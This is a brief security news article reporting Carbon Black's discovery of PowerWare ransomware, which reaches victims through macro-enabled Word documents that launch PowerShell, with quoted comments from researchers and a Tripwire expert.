PowerWare ransomware uncovered, uses PowerShell for insertion

PowerWare embeds itself in the Windows operating system after being delivered via a phishing scam.
PowerWare embeds itself in the Windows operating system after being delivered via a phishing scam.

Cyber crooks once again found a way to use a Microsoft product to victimize the public.

The Carbon Black Research Team has discovered a new ransomware family, called PowerWare, that uses Microsoft Word and PowerShell, the scripting language behind Microsoft's operating systems. Instead of inserting malware onto a computer, PowerWare leverages PowerShell to avoid detection by blending in with a computer's legitimate activity, Carbon Black wrote.

“Our research found that PowerWare is delivered via a macro-enabled Microsoft Word document. The Word document then uses macros to spawn “cmd.exe,” which in turn calls PowerShell with options that will download and run the malicious PowerWare code,” wrote Carbon Black researchers Rico Valdez and Mike Sconzo.

Once PowerWare is installed, the bad guys demand $500 ransoms, which increases to $1,000 after two weeks.

The ransomware was discovered when Carbon Black investigated a healthcare customer that had been hit with an unsuccessful phishing campaign. Several healthcare providers have been hit with ransomware in the last few months.

“Ransomware authors are always trying to evolve to avoid detection, and using built-in Windows capabilities makes the malicious activity less noticeable," said Tim Erlin, Tripwire's director of IT security and risk strategy. "This ransomware may change its encryption technique, but it still requires an entry point onto the system."

Malicious Word files sent through emails and the use of Microsoft Office macros is tried-and-true vector for this new malware, he added.

You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

TOP COMMENTS